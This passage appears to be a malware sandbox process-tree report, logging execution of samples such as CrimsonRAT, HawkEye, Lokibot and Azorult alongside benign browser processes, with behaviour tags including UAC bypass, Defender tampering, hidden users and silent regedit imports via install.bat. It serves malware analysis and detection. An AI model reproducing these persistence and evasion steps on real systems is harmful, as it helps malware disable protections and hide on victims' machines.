    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10168 -childID 48 -isForBrowser -prefsHandle 9604 -prefMapHandle 7884 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a28a2a94-84e5-4683-a68a-60b33bbe2ad8} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9772 -childID 49 -isForBrowser -prefsHandle 9268 -prefMapHandle 10996 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7209eb2e-89db-4121-b354-0ec4ff34f594} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7532
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10800 -childID 50 -isForBrowser -prefsHandle 10108 -prefMapHandle 10276 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af995a8c-1504-4536-a58f-ab047fc63218} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:4536
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7900 -childID 51 -isForBrowser -prefsHandle 9808 -prefMapHandle 7652 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72d98784-b671-4175-8fb3-87d92e7f99ec} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:8112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9728 -childID 52 -isForBrowser -prefsHandle 6624 -prefMapHandle 4396 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7bef5b5-22ae-4198-8075-b8e99726fe8e} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7936
- - C:\Users\Admin\Downloads\BlueScreen(1).exe
    "C:\Users\Admin\Downloads\BlueScreen(1).exe"
    3⤵
    - Executes dropped EXE
    PID:4840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 53 -isForBrowser -prefsHandle 9348 -prefMapHandle 5456 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d729b6c-5e6d-4448-a108-a47cda368e54} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:1676
- - C:\Users\Admin\Downloads\CrimsonRAT.exe
    "C:\Users\Admin\Downloads\CrimsonRAT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
  - - C:\ProgramData\Hdlharas\dlrarhsiva.exe
      "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
      4⤵
      Executes dropped EXE
      PID:7716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\UnregisterAssert.bat" "
1⤵
PID:6352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\UnregisterAssert.bat" "
1⤵
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\UnregisterAssert.bat" "
1⤵
PID:6580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\UnregisterAssert.bat" "
1⤵
PID:6700

C:\Windows\SysWOW64\DllHost.exe
"C:\Windows\SysWOW64\DllHost.exe" /Processid:{5250E46F-BB09-D602-5891-F476DC89B700}
1⤵
- Loads dropped DLL
PID:6824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\UnregisterAssert.bat" "
1⤵
PID:6976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4116,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4044 /prefetch:14
1⤵
PID:6536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3776,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:14
1⤵
PID:2968

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:7936

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:8032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:8068

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4788

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5504

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
1⤵
- Executes dropped EXE
PID:2968

C:\Users\Admin\Downloads\Minecraft.exe
"C:\Users\Admin\Downloads\Minecraft.exe"
1⤵
- Executes dropped EXE
PID:4516
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Xms256m -Xmx512m -jar "C:\Users\Admin\Downloads\Minecraft.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4816

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:7956

C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.50.24002.0_x64__8wekyb3d8bbwe\GameBar.exe
"C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.50.24002.0_x64__8wekyb3d8bbwe\GameBar.exe" -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:7260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2772,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=1016 /prefetch:14
1⤵
PID:5324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4248,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4068 /prefetch:14
1⤵
PID:7436

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
PID:5468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
PID:1496

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:832

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:7980

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1084

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5588

C:\Users\Admin\Downloads\FreeLauncher.exe
"C:\Users\Admin\Downloads\FreeLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:7844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4008,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4924 /prefetch:14
1⤵
PID:5468

C:\Users\Admin\Downloads\butterflyondesktop.exe
"C:\Users\Admin\Downloads\butterflyondesktop.exe"
1⤵
- Executes dropped EXE
PID:5428
- C:\Users\Admin\AppData\Local\Temp\is-9S4C3.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-9S4C3.tmp\butterflyondesktop.tmp" /SL5="$20738,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of FindShellTrayWindow
  PID:4944
- - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
    "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:1452
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
      4⤵
      PID:7364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4932,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
1⤵
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --always-read-main-dll --field-trial-handle=4276,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:1
1⤵
PID:1112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5416,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5552 /prefetch:14
1⤵
PID:3156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=5544,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:14
1⤵
PID:5244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:7496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x258,0x7ffbe1e6f208,0x7ffbe1e6f214,0x7ffbe1e6f220
  2⤵
  PID:7944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1772,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:11
  2⤵
  PID:7028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2140,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:6308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:13
  2⤵
  PID:6572
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4448,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:14
  2⤵
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4448,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:14
  2⤵
  PID:8184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4584,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:14
  2⤵
  PID:6508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4948,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4940,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4984 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5460,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5520,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:14
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5656,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:14
  2⤵
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6100,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:6812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4968,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:14
  2⤵
  PID:7148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:14
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5712,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:14
  2⤵
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4916 /prefetch:14
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6744,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6748 /prefetch:14
  2⤵
  PID:7968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5800,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:14
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:14
  2⤵
  PID:7564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6548,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:14
  2⤵
  PID:7792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5692,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:10
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6924 /prefetch:14
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6532,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:14
  2⤵
  PID:6440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4748,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:14
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3908,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:14
  2⤵
  PID:7984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3936,i,8153600473551552024,13923163952616180781,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:14
  2⤵
  PID:760

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:7344

C:\Users\Admin\Downloads\HawkEye.exe
"C:\Users\Admin\Downloads\HawkEye.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7984

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:3328

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:6024
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:4688
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:7668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:7716
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:3756
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:8168
